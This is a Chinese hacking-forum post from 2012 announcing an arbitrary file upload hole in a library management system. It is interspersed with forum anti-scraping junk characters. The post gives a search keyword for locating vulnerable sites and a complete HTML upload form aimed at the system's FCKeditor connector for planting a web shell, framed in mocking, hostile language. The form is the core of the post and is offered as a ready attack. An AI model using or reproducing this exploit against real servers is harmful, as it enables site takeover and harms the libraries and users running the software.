主题:图书馆系统任意文件上传漏洞! N7 r, n9 M2 ]. y: u& ]) |* D
作者:冰锋刺客2 E6 k1 W2 b. N4 j% J
厂商:点击书(dianjishu.com)
2 o. D" Q! c$ k: \ 日期:2012-6-21
6 o5 {: U# U$ T$ m% }
+ A7 e# _' Y: ^+ l, Z6 mI 概述
' E) k5 V- c6 R4 [ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
; d' c* [& u" |+ }6 G. e* l8 G II 简介
3 o) G, r* w. c- [! y 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"5 w& R4 d7 [3 F3 ~" ^( \# A2 `4 T) U
补充一个漏洞
8 S' L& C9 _' v3 G$ }7 N+ U2 V <form id="frmUpload" enctype="multipart/form-data"
9 a( ]4 a; P( X action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>3 j0 j e X+ c- E6 L/ l
<input id="btnUpload" type="submit" value="操翻他">
$ o, }3 u0 k$ ~$ o. J$ g; r& H </form>9 L' ^4 p1 z3 }5 S+ x" Q8 t; _
你们懂的
# j P9 }6 t# Y8 I- B" f$ F+ t 那傻逼提供还需要改包.
! N$ J6 Q* i( M( G9 M& z$ E( k 自己看了下源代码发现fckeditor
7 P; l ^- {0 r 直接秒杀
7 B1 M2 s. x7 h& }( N+ T( ?: ?$ m. Y |
发表于 2012-9-10 21:20:59
收藏
支持
反对